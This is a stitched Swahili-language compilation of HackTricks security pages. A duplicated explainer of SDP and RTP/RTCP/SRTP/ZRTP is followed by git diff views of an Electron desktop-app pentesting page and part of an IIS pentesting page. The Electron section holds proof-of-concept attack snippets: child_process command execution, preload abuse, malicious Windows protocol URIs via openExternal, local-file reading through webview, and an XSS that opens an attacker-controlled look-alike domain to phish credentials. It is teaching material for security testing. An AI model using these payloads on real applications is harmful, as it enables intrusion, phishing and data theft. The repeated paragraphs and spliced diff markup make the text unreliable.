4. **Sifa**: SDP inasaidia matumizi ya sifa kutoa habari ya ziada, hiari kuhusu kikao au mto wa media. Sifa zinaweza kutumika kwa kufafanua vipengele mbalimbali kama vile funguo za encryption, mahitaji ya upana wa bandari, au mifumo ya kudhibiti media.
SDP kawaida hutumiwa katika mchakato ufuatao:
1. Chama cha kuanzisha hujenga maelezo ya SDP ya kikao cha multimedia kilichopendekezwa, ikiwa ni pamoja na maelezo ya mito ya media na sifa zao.
2. Maelezo ya SDP hutumwa kwa chama cha kupokea, kawaida imejumuishwa ndani ya ujumbe wa itifaki ya ishara kama SIP au RTSP.
3. Chama cha kupokea huprocess maelezo ya SDP, na kulingana na uwezo wake, inaweza kukubali, kukataa, au kurekebisha kikao kilichopendekezwa.
1. Chama cha kuanzisha hujenga maelezo ya SDP ya kikao cha multimedia kinachopendekezwa, ikiwa ni pamoja na maelezo ya mito ya media na sifa zao.
2. Maelezo ya SDP hutumwa kwa chama kinachopokea, kawaida imejumuishwa ndani ya ujumbe wa itifaki ya ishara kama SIP au RTSP.
3. Chama kinachopokea huprocess maelezo ya SDP, na kulingana na uwezo wake, inaweza kukubali, kukataa, au kurekebisha kikao kilichopendekezwa.
4. Maelezo ya mwisho ya SDP hutumwa kwa chama cha kuanzisha kama sehemu ya ujumbe wa itifaki ya ishara, kukamilisha mchakato wa majadiliano.
Urahisi na uwezo wa kubadilika wa SDP hufanya iwe kiwango kilichokubaliwa sana kwa kuelezea vikao vya multimedia katika mifumo mbalimbali ya mawasiliano, ikicheza jukumu muhimu katika kuanzisha na kusimamia vikao vya multimedia halisi kwenye mitandao ya IP.
### RTP / RTCP / SRTP / ZRTP
1. **RTP (Itifaki ya Usafirishaji wa Moja kwa Moja)**: RTP ni itifaki ya mtandao iliyoundwa kwa utoaji wa data ya sauti na video, au media halisi wakati mwingine, juu ya mitandao ya IP. Iliundwa na **IETF** na kufafanuliwa katika **RFC 3550**, RTP mara nyingi hutumiwa na itifaki za ishara kama SIP na H.323 kuwezesha mawasiliano ya multimedia. RTP hutoa mbinu za **synchronization**, **sequencing**, na **timestamping** ya mito ya media, ikisaidia kuhakikisha uchezaji wa media laini na wa wakati unaofaa.
2. **RTCP (Itifaki ya Kudhibiti Usafirishaji wa Moja kwa Moja)**: RTCP ni itifaki mshirika wa RTP, hutumika kwa ufuatiliaji wa ubora wa huduma (QoS) na kutoa maoni kuhusu usafirishaji wa mito ya media. Imefafanuliwa katika **RFC 3550** sawa na RTP, RTCP **hutumia kubadilishana pakiti za kudhibiti kati ya washiriki katika kikao cha RTP**. Inashiriki habari kama upotevu wa pakiti, jitter, na muda wa safari ya pande zote, ambayo husaidia katika kutambua na kuzoea hali za mtandao, kuboresha ubora wa jumla wa media.
3. **SRTP (Itifaki ya Usafirishaji Salama wa Moja kwa Moja)**: SRTP ni upanuzi wa RTP ambao hutoa **encryption**, **uthibitisho wa ujumbe**, na **ulinzi dhidi ya kurudia** kwa mito ya media, ikihakikisha usafirishaji salama wa data nyeti ya sauti na video. Imefafanuliwa katika **RFC 3711**, SRTP hutumia mbinu za kryptografia kama AES kwa encryption na HMAC-SHA1 kwa uthibitisho wa ujumbe. SRTP mara nyingi hutumiwa pamoja na itifaki za ishara salama kama SIP juu ya TLS kutoa usalama mwisho hadi mwisho katika mawasiliano ya multimedia.
4. **ZRTP (Itifaki ya Usafirishaji wa Moja kwa Moja ya Zimmermann)**: ZRTP ni itifaki ya makubaliano ya funguo ya kryptografia ambayo hutoa **encryption mwisho hadi mwisho** kwa mito ya media ya RTP. Iliyoundwa na Phil Zimmermann, mwumbaji wa PGP, ZRTP inaelezwa katika **RFC 6189**. Tofauti na SRTP, ambayo inategemea itifaki za ishara kwa kubadilishana funguo, ZRTP imeundwa kufanya kazi bila kutegemea itifaki ya ishara. Inatumia **Diffie-Hellman key exchange** kuanzisha siri iliyoshirikiwa kati ya vyama vinavyoongea, bila kuhitaji imani ya awali au miundombinu ya funguo ya umma (PKI). ZRTP pia inajumuisha vipengele kama **Short Authentication Strings (SAS)** kulinda dhidi ya mashambulizi ya mtu katikati.
1. **RTP (Itifaki ya Usafirishaji wa Moja kwa Moja)**: RTP ni itifaki ya mtandao iliyoundwa kwa utoaji wa data za sauti na video, au media halisi nyingine, juu ya mitandao ya IP. Iliundwa na **IETF** na kufafanuliwa katika **RFC 3550**, RTP mara nyingi hutumiwa pamoja na itifaki za ishara kama SIP na H.323 ili kuwezesha mawasiliano ya multimedia. RTP hutoa mbinu za **synchronization**, **sequencing**, na **timestamping** ya mito ya media, ikisaidia kuhakikisha uchezaji wa media bila mkwamo na kwa wakati.
2. **RTCP (Itifaki ya Kudhibiti Usafirishaji wa Moja kwa Moja)**: RTCP ni itifaki mshirika wa RTP, hutumika kwa ufuatiliaji wa ubora wa huduma (QoS) na kutoa maoni kuhusu uhamishaji wa mito ya media. Imefafanuliwa katika **RFC 3550** sawa na RTP, RTCP **hutumia kubadilishana pakiti za kudhibiti kati ya washiriki katika kikao cha RTP**. Inashiriki habari kama upotevu wa pakiti, jitter, na muda wa safari ya pande zote, ambayo husaidia katika kutambua na kuzoea hali za mtandao, kuboresha ubora wa jumla wa media.
3. **SRTP (Itifaki ya Usafirishaji Salama wa Moja kwa Moja)**: SRTP ni upanuzi wa RTP ambao hutoa **encryption**, **uthibitisho wa ujumbe**, na **ulinzi dhidi ya kurudia** kwa mito ya media, ikihakikisha uhamishaji salama wa data nyeti za sauti na video. Imefafanuliwa katika **RFC 3711**, SRTP hutumia mbinu za kryptografia kama AES kwa encryption na HMAC-SHA1 kwa uthibitisho wa ujumbe. SRTP mara nyingi hutumiwa pamoja na itifaki za ishara salama kama SIP juu ya TLS kutoa usalama mwisho hadi mwisho katika mawasiliano ya multimedia.
4. **ZRTP (Itifaki ya Usafirishaji wa Moja kwa Moja ya Zimmermann)**: ZRTP ni itifaki ya makubaliano ya funguo ya kryptografia ambayo hutoa **encryption mwisho hadi mwisho** kwa mito ya media ya RTP. Iliyoundwa na Phil Zimmermann, mbunifu wa PGP, ZRTP inaelezwa katika **RFC 6189**. Tofauti na SRTP, ambayo inategemea itifaki za ishara kwa kubadilishana funguo, ZRTP imeundwa kufanya kazi bila kutegemea itifaki ya ishara. Inatumia **Diffie-Hellman key exchange** kuanzisha siri iliyoshirikiwa kati ya vyama vinavyoongea, bila kuhitaji imani ya awali au miundombinu ya funguo ya umma (PKI). ZRTP pia inajumuisha vipengele kama **Short Authentication Strings (SAS)** kulinda dhidi ya mashambulizi ya mtu katikati.
Itifaki hizi zina jukumu muhimu katika **utoaji na kuhakikisha usalama wa mawasiliano ya multimedia halisi kwenye mitandao ya IP**. Wakati RTP na RTCP hushughulikia usafirishaji halisi wa media na ufuatiliaji wa ubora, SRTP na ZRTP huhakikisha kuwa media iliyotumwa inalindwa dhidi ya kusikiliza, kuhariri, na mashambulizi ya kurudia.
Itifaki hizi zina jukumu muhimu katika **utoaji na kuhakikisha usalama wa mawasiliano ya multimedia halisi kwenye mitandao ya IP**. Wakati RTP na RTCP hushughulikia uhamishaji halisi wa media na ufuatiliaji wa ubora, SRTP na ZRTP huhakikisha kuwa media iliyohamishwa inalindwa dhidi ya kusikiliza, kuhariri, na mashambulizi ya kurudia.
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}

View file

@ -1,4 +1,4 @@
# Programu za Kompyuta za Meza za Electron
# Programu za Kompyuta za Electron
<details>
@ -6,7 +6,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -14,9 +14,9 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za wizi**.
@ -37,7 +37,7 @@ Kawaida unaweza kupata msimbo wa programu ya electron ndani ya programu ya `.asa
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza kupata `main.js` ambapo mipangilio ya usalama imewekwa.
Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza kupata `main.js` faili ambapo mipangilio ya usalama imewekwa.
```json
{
"name": "standard-notes",
@ -46,11 +46,11 @@ Katika msimbo wa chanzo wa programu ya Electron, ndani ya `packet.json`, unaweza
Electron ina aina 2 za michakato:
* Michakato ya Kuu (ina ufikivu kamili wa NodeJS)
* Michakato ya Mwonekano (inapaswa kuwa na ufikivu mdogo wa NodeJS kwa sababu za usalama)
* Michakato ya Kuchora (inapaswa kuwa na ufikivu mdogo wa NodeJS kwa sababu za usalama)
![](<../../../.gitbook/assets/image (179).png>)
Mchakato wa **mwonekano** utakuwa dirisha la kivinjari linalopakia faili:
**Michakato ya kuchora** itakuwa dirisha la kivinjari linalopakia faili:
```javascript
const {BrowserWindow} = require('electron');
let win = new BrowserWindow();
@ -58,17 +58,17 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
Mipangilio ya **mchakato wa renderer** inaweza **kusanidiwa** katika **mchakato wa msingi** ndani ya faili ya main.js. Baadhi ya mipangilio itazuia programu ya Electron kupata RCE au vulnerabilities nyingine ikiwa **mipangilio imewekwa kwa usahihi**.
Mipangilio ya **mchakato wa renderer** inaweza **kusanidiwa** katika **mchakato wa msingi** ndani ya faili ya main.js. Baadhi ya mipangilio itazuia programu ya Electron kupata RCE au udhaifu mwingine ikiwa **mipangilio imewekwa kwa usahihi**.
Programu ya electron **inaweza kupata kifaa** kupitia apis za Node ingawa inaweza kusanidiwa kuzuia hilo:
Programu ya electron **inaweza kupata kifaa** kupitia apis za Node ingawa inaweza kusanidiwa kuzuia:
* **`nodeIntegration`** - ni `off` kwa chaguo-msingi. Ikiwa ni `on`, inaruhusu kupata vipengele vya Node kutoka kwa mchakato wa renderer.
* **`nodeIntegration`** - ni `off` kwa chaguo-msingi. Ikiwa ni `on`, inaruhusu kupata vipengele vya node kutoka kwa mchakato wa renderer.
* **`contextIsolation`** - ni `on` kwa chaguo-msingi. Ikiwa ni `off`, mchakato wa msingi na renderer hawajaachanishwa.
* **`preload`** - tupu kwa chaguo-msingi.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - ni off kwa chaguo-msingi. Itazuia vitendo ambavyo NodeJS inaweza kutekeleza.
* Ushirikiano wa Node katika Wafanyikazi
* **`nodeIntegrationInSubframes`** - ni `off` kwa chaguo-msingi.
* Ikiwa **`nodeIntegration`** ime **wezeshwa**, hii itaruhusu matumizi ya **Node.js APIs** katika kurasa za wavuti ambazo zimeloadiwa kwenye iframes ndani ya programu ya Electron.
* Ikiwa **`nodeIntegration`** ime **wezeshwa**, hii itaruhusu matumizi ya **Node.js APIs** kwenye kurasa za wavuti zilizopakiwa kwenye iframes ndani ya programu ya Electron.
* Ikiwa **`nodeIntegration`** ime **lemazwa**, basi preloads zitapakia kwenye iframe
Mfano wa usanidi:
@ -137,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
Skripti iliyotajwa katika mazingira haya ina**l**oaded kabla ya skripti zingine kwenye renderer**, hivyo ina **upatikanaji usio na kikomo wa Node APIs**:
Skripti iliyotajwa katika mazingira haya ina**ngia kabla ya skripti zingine kwenye renderer**, hivyo ina **upatikanaji usio na kikomo wa Node APIs**:
```javascript
new BrowserWindow{
webPreferences: {
@ -146,7 +146,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
Kwa hivyo, scripti inaweza kuuza node-features kwa kurasa:
Kwa hivyo, script inaweza kuuza node-features kwa kurasa:
{% code title="preload.js" %}
```javascript
@ -174,16 +174,16 @@ runCalc();
## RCE: XSS + contextIsolation
_**contextIsolation**_ inaleta **muktadha uliogawanyika kati ya skripti za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron** ili utekelezaji wa JavaScript wa kila msimbo usiathiri kila mmoja. Hii ni sifa muhimu ya kufuta uwezekano wa RCE.
_**contextIsolation**_ inaleta **mazingira tofauti kati ya hati za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron** ili utekelezaji wa JavaScript wa kila msimbo usiathiri mwingine. Hii ni kipengele muhimu cha kufuta uwezekano wa RCE.
Ikiwa muktadha haujatengwa, mkaidi anaweza:
Ikiwa mazingira hayajaachwa kwa kujitegemea, mshambuliaji anaweza:
1. Tekeleza **JavaScript ya kupindukia kwenye mchirizi** (XSS au urambazaji kwenye tovuti za nje)
2. **Kubadilisha njia iliyojengwa** ambayo hutumiwa katika upakiaji wa msimbo au msimbo wa ndani wa Electron kuwa kazi yake mwenyewe
3. **Kuzindua** matumizi ya **kazi iliyobadilishwa**
1. Kutekeleza **JavaScript ya kupindukia kwenye renderer** (XSS au kupeleka kwenye tovuti za nje)
2. **Kubadilisha njia iliyojengwa** ambayo hutumiwa katika upakiaji au msimbo wa ndani wa Electron kuwa kazi yake mwenyewe
3. **Kuzindua** matumizi ya **njia iliyobadilishwa**
4. RCE?
Kuna sehemu 2 ambapo njia zilizojengwa zinaweza kubadilishwa: Katika msimbo wa upakiaji au katika msimbo wa ndani wa Electron:
Kuna sehemu 2 ambapo njia zilizoingizwa zinaweza kubadilishwa: Katika msimbo wa upakiaji au katika msimbo wa ndani wa Electron:
{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
@ -207,14 +207,14 @@ window.addEventListener('click', (e) => {
Kwa habari zaidi kuhusu mifano hii angalia [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) na [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
Wakati wa kutekeleza programu ya desktop ya Electron, kuhakikisha mipangilio sahihi kwa `nodeIntegration` na `contextIsolation` ni muhimu. Imethibitishwa kwamba **utekelezaji wa kanuni za mbali (RCE)** upande wa mteja unalenga skripti za kuanzisha au kanuni ya asili ya Electron kutoka kwa mchakato kuu inazuia kwa ufanisi na mipangilio hii ikiwekwa.
Wakati wa kutekeleza programu ya desktop ya Electron, kuhakikisha mipangilio sahihi kwa `nodeIntegration` na `contextIsolation` ni muhimu. Imethibitishwa kwamba **utekelezaji wa kanuni za mbali (RCE)** upande wa mteja unalenga skripti za kuanzisha au kanuni za asili za Electron kutoka kwa mchakato wa msingi unazuia kwa ufanisi na mipangilio hii ikiwa mahali.
Mara tu mtumiaji anaposhirikiana na viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio hutekelezwa, ambayo ni muhimu kwa usalama na utendaji wa programu:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
Hizi wasikilizaji **zinafutwa na programu ya desktop** ili kutekeleza **mantiki yake ya biashara**. Programu huchambua ikiwa kiungo kilichonavigated kinapaswa kufunguliwa ndani au kwenye kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, `openInternally`. Ikiwa kazi hii inarudi `false`, inaashiria kwamba kiungo kinapaswa kufunguliwa kwa nje, kwa kutumia kazi ya `shell.openExternal`.
Watu hawa **hufutwa na programu ya desktop** ili kutekeleza **mantiki yake ya biashara**. Programu huchambua ikiwa kiungo kilichopita kinapaswa kufunguliwa ndani au kwenye kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, `openInternally`. Ikiwa kazi hii inarudi `uwongo`, inaashiria kwamba kiungo kinapaswa kufunguliwa kwa nje, kwa kutumia kazi ya `shell.openExternal`.
**Hapa kuna pseudocode iliyosimpliwa:**
@ -222,7 +222,7 @@ Hizi wasikilizaji **zinafutwa na programu ya desktop** ili kutekeleza **mantiki
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
Mazoea bora ya usalama ya Electron JS yanashauri dhidi ya kukubali maudhui yasiyotegemewa na kazi ya `openExternal`, kwani inaweza kusababisha RCE kupitia itifaki mbalimbali. Mifumo ya uendeshaji inasaidia itifaki tofauti ambazo zinaweza kusababisha RCE. Kwa mifano kamili na maelezo zaidi juu ya mada hii, mtu anaweza kurejelea [rasilimali hii](https://positive.security/blog/url-open-rce#windows-10-19042), ambayo inajumuisha mifano ya itifaki za Windows zenye uwezo wa kutumia udhaifu huu.
Mazoea bora ya usalama ya Electron JS yanashauri dhidi ya kukubali maudhui yasiyotegemewa na kazi ya `openExternal`, kwani inaweza kusababisha RCE kupitia itifaki mbalimbali. Mifumo ya uendeshaji inasaidia itifaki tofauti ambazo zinaweza kusababisha RCE. Kwa mifano kamili na maelezo zaidi kuhusu mada hii, mtu anaweza kurejelea [rasilimali hii](https://positive.security/blog/url-open-rce#windows-10-19042), ambayo inajumuisha mifano ya itifaki za Windows zenye uwezo wa kutumia udhaifu huu.
**Mifano ya mashambulizi ya itifaki za Windows ni pamoja na:**
```html
@ -240,7 +240,7 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
```
## Kusoma Faili za Ndani: XSS + contextIsolation
**Kulemaza `contextIsolation` inawezesha matumizi ya vitambulisho vya `<webview>`**, sawa na `<iframe>`, kwa kusoma na kuchukua faili za ndani. Mfano uliotolewa unaonyesha jinsi ya kutumia udhaifu huu kusoma maudhui ya faili za ndani:
**Kulegeza `contextIsolation` inawezesha matumizi ya vitambulisho vya `<webview>`**, sawa na `<iframe>`, kwa kusoma na kuchukua faili za ndani. Mfano uliotolewa unaonyesha jinsi ya kutumia udhaifu huu kusoma maudhui ya faili za ndani:
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
@ -255,36 +255,36 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
```
## **RCE: XSS + Chromium ya Zamani**
Ikiwa **chromium** inayotumiwa na programu ni **zamani** na kuna **mapungufu yaliyojulikana** kwenye hiyo, inaweza kuwa inawezekana **kuitumia na kupata RCE kupitia XSS**.\
Ikiwa **chromium** inayotumiwa na programu ni **zamani** na kuna **mapungufu yanayojulikana** kwenye hiyo, inaweza kuwa inawezekana **kuitumia na kupata RCE kupitia XSS**.\
Unaweza kuona mfano katika **makala hii**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **XSS ya Uvutaji wa Kitambulisho kupitia Uvukaji wa Regex wa URL ya Ndani**
## **XSS ya Uvutaji kwa njia ya Bypass ya Regex ya URL ya Ndani**
Kukisia umepata XSS lakini huwezi **kuchochea RCE au kuiba faili za ndani** unaweza kujaribu kutumia hiyo **kuiba vibali kupitia uvutaji**.
Kukisia umepata XSS lakini **hauwezi kuzindua RCE au kuiba faili za ndani** unaweza kujaribu kuitumia kuiba **vyeti kupitia uvutaji**.
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukichunguza msimbo wa JS katika sehemu ya mbele:
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, kwa kuangalia msimbo wa JS katika sehemu ya mbele:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
Mwito wa **`openInternally`** utaamua ikiwa **kiungo** kitafunguliwa kwenye **dirisha la desktop** kama ni kiungo kinachomilikiwa na jukwaa, **au** ikiwa kitafunguliwa kwenye **kivinjari kama rasilimali ya tatu**.
Mwito wa **`openInternally`** utaamua ikiwa **kiungo** kitafunguliwa kwenye **dirisha la desktop** kama ni kiungo kinachomilikiwa na jukwaa, **au** kitafunguliwa kwenye **kivinjari kama rasilimali ya tatu**.
Katika kesi **regex** inayotumiwa na kazi hiyo inaweza kuwa **dhaifu kwa kuzidiwa** (kwa mfano kwa **kutotoroka** vipande vya subdomains) mkaidi anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mkaidi **na kuomba vibali** kwa mtumiaji:
Katika kesi **regex** inayotumiwa na kazi hiyo ni **dhaifu kwa kuzidiwa** (kwa mfano kwa **kutotoroka** vipande vya subdomains) mshambuliaji anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mshambuliaji **kutaka vibali** kutoka kwa mtumiaji:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>
```
## **Vyombo**
## **Vifaa**
* [**Electronegativity**](https://github.com/doyensec/electronegativity) ni chombo cha kutambua mipangilio isiyofaa na mifano ya usalama katika programu za Electron.
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) ni programu-jalizi ya VS Code ya chanzo wazi kwa programu za Electron inayotumia Electronegativity.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa ajili ya kuangalia maktaba za tatu zinazoweza kuwa na mapungufu.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa ajili ya kuangalia maktaba za tatu zinazoweza kuwa na mapungufu ya usalama.
* [**Electro.ng**](https://electro.ng/): Unahitaji kununua
## Maabara
Katika [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) unaweza kupata maabara ya kutumia programu za Electron zilizo na mapungufu.
Katika [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) unaweza kupata maabara ya kutumia programu za Electron zilizo na mapungufu.
Baadhi ya amri zitakazokusaidia katika maabara:
```bash
@ -319,11 +319,11 @@ npm start
* Utafiti zaidi na maandishi kuhusu usalama wa Electron katika [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **stealer malwares**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
@ -341,6 +341,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -6,19 +6,19 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
@ -53,13 +53,13 @@ Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
## Tekeleza faili za .config
## Kutekeleza faili za .config
Unaweza kupakia faili za .config na kuzitumia kutekeleza nambari. Moja ya njia ya kufanya hivyo ni kwa kuongeza nambari mwishoni mwa faili ndani ya maoni ya HTML: [Pakua mfano hapa](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
Taarifa zaidi na mbinu za kutumia udhaifu huu zinapatikana [hapa](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## Uchunguzi wa IIS kwa Njia ya Kufanya Majaribio ya Nguvu
## IIS Discovery Bruteforce
Pakua orodha niliyoandaa:
@ -83,8 +83,8 @@ Tumia bila kuongeza kificho chochote, faili zinazohitaji zina tayari.
Angalia maelezo kamili hapa: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% hint style="info" %}
Kama muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zenye marejeo kwa faili za "**assemblyIdentity**" na "**namespaces**". Kwa habari hii ni rahisi kujua **wapi kuna faili za kutekelezwa** na kuzipakua.\
Kutoka kwa **Dlls zilizopakuliwa** pia ni rahisi kupata **namespaces mpya** ambapo unapaswa kujaribu kupata na kupata faili ya web.config ili kupata namespaces na assemblyIdentity mpya.\
Kama muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zenye marejeo kwa faili za "**assemblyIdentity**" na "**namespaces**". Kwa habari hii ni rahisi kujua **wapi faili za kutekelezwa** zilizopo na kuzipakua.\
Kutoka kwenye **Dlls zilizopakuliwa** pia ni rahisi kupata **namespaces mpya** ambapo unapaswa kujaribu kupata na kupata faili ya web.config ili kupata namespaces mpya na assemblyIdentity.\
